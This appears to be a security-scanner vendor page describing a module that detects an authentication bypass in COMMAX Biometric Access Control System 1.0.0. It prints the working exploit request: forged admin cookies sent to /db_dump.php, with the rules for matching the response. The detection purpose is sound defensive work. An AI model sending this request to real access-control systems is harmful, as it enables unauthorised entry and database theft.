Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass" module is designed to detect an authentication bypass vulnerability in the COMMAX Biometric Access Control System version 1.0.0. This vulnerability allows unauthorized access to the system, compromising its security. The severity of this vulnerability is classified as critical.
If exploited, this vulnerability can lead to unauthorized access to the COMMAX Biometric Access Control System. Attackers can bypass the authentication mechanism and gain control over the system, potentially compromising the security of the premises it is protecting.
The module works by sending an HTTP request to the target system and analyzing the response. It checks for specific conditions to determine if the authentication bypass vulnerability is present. The request template used by the module is as follows:
GET /db_dump.php HTTP/1.1
Host: {%Hostname%}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: /user_add.php
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
The module then applies the following matching conditions to the response:
- The response body must contain the HTML title tag "::: COMMAX :::
".
- The response header must include the word "text/html
".
- The HTTP status code must be 200
.
If all the matching conditions are met, the module identifies the presence of the authentication bypass vulnerability.
This module is a valuable tool for security professionals and system administrators to identify and mitigate the authentication bypass vulnerability in the COMMAX Biometric Access Control System 1.0.0.